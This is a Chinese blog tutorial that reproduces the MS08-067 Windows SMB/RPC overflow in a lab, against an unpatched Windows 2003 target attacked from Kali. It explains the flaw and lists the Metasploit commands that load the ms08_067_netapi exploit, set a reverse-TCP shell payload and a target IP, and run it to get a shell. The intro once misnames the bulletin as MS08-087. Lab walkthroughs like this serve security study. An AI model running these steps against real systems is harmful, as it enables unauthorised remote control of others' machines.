前言
本次介紹Windows系統漏洞 MS08-087
一、MS08-067 介紹
Windows Server服務 RPC 緩沖區遠端溢出漏洞
編号 MS08-067
二、漏洞複現
1.漏洞原理
MS08_067漏洞滲透攻擊原理
其原理就是攻擊者利用受害者預設開啟的SMB服務端口445端口發送惡意的資料到這個端口,通過MSRPC接口調用Server服務的函數,并破壞程式的棧緩沖區,利用遠端代碼執行權限,進而控制主機
2.漏洞複現
前期準備: 靶機:Windows 2003 (未打更新檔)
攻擊機:kali Linux
MS08_067漏洞滲透攻擊過程
使用Metasploit中對應的子產品進行滲透攻擊。
啟動Metasploit,進入之後搜尋對于漏洞子產品
Search ms08-067
搜尋到ms08-067 對于的漏洞子產品,滲透子產品又四部分組成 分别代表子產品類型 目标平台 目标服務 子產品名稱 組成
2. 使用這個子產品
Use exploit/windows/smb/ms08_067_netapi
3.檢視所需條件
Show options
需要設定靶機的ip位址 攻擊載荷 靶機的系統平台版本
4. 設定攻擊載荷
攻擊載荷就是payload 就是常見的shelllode
首先查找payload
Show payload
找到所需的payload
generic/shell_reverse_tcp
使用這個payload
Set payload generic/shell_reverse_tcp
5. 設定靶機的主機版本
Show targets
在前期對靶機的探測當中獲得的主機版本消息,找到合适的版本資訊
Automatic Targeting 選擇這個系統會自動選擇合适的版本攻擊
6.設定IP位址等資訊
Set rhost 10.10.10.130
7.運作
Run
8.得到shell
輸入shell 進入shell互動式
總結
今天介紹了 Windows經典漏洞 MS08-067 漏洞攻擊原理和複現過程
————————————————
版權聲明:本文為CSDN部落客「愛學網安的萌新」的原創文章,遵循CC 4.0 BY-SA版權協定,轉載請附上原文出處連結及本聲明。
原文連結:https://blog.csdn.net/weixin_60888404/article/details/125112307